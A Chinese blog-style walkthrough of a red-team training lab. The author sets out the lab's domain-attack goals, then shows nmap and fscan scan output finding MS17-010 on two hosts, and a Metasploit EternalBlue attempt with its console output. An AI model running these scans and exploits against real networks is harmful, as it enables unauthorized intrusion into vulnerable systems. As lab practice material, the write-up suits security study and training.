内网渗透之**ATT&CK实战系列-红队评估(二)**靶场记录
前言
考研!!!
高数真的折磨我这种人啊,打开电脑上号,赶紧打一把内网渗透醒醒脑子,感觉自己快要蒸发。
gogogo
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。
本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。1.Bypass UAC
2.Windows系统NTLM获取(理论知识:Windows认证)
3.Access Token利用(MSSQL利用)
获取域控主机桌面上的flag文件内容进行提交 4.WMI利用
5.网页代理,二层代理,特殊协议代理(DNS,ICMP)
6.域内信息收集
7.域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
8.域凭证收集
9.后门技术(黄金票据/白银票据/Sid History/MOF)
环境说明:
DMZ网段:172.25.0.1/24
内网网段:10.10.10.1/24
拓扑图如下

nmap扫描一下
nmap -sT -Pn 172.25.0.1/24
nmap太慢了,直接fscan走起吧,扫描结果如下
start infoscan
(icmp) Target 172.25.0.1 is alive
(icmp) Target 172.25.0.16 is alive
(icmp) Target 172.25.0.22 is alive
[*] Icmp alive hosts len is: 3
172.25.0.22:80 open
172.25.0.16:135 open
172.25.0.22:135 open
172.25.0.16:445 open
172.25.0.1:22 open
172.25.0.22:139 open
172.25.0.22:445 open
172.25.0.16:139 open
172.25.0.22:1433 open
[*] alive ports len is: 9
start vulscan
[*] WebTitle: http://172.25.0.22 code:200 len:0 title:None
[*] NetInfo:
[*]172.25.0.16
[->]PC
[->]10.10.10.201
[->]172.25.0.16
[+] 172.25.0.16 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.25.0.22 MS17-010 (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] NetBios: 172.25.0.22 WEB.de1ay.com Windows Server 2008 R2 Standard 7601 Service Pack 1
16和22存在MS17,先打下来这俩,msf启动
16是32位架构的主机,msf的ms17利用默认是64
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.25.0.16
RHOSTS => 172.25.0.16
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.72.128:4444
[*] 172.25.0.16:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.25.0.16:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x86 (32-bit)
[*] 172.25.0.16:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.25.0.16:445 - The target is vulnerable.
[-] 172.25.0.16:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
22是64位,直接打下来,拿到权限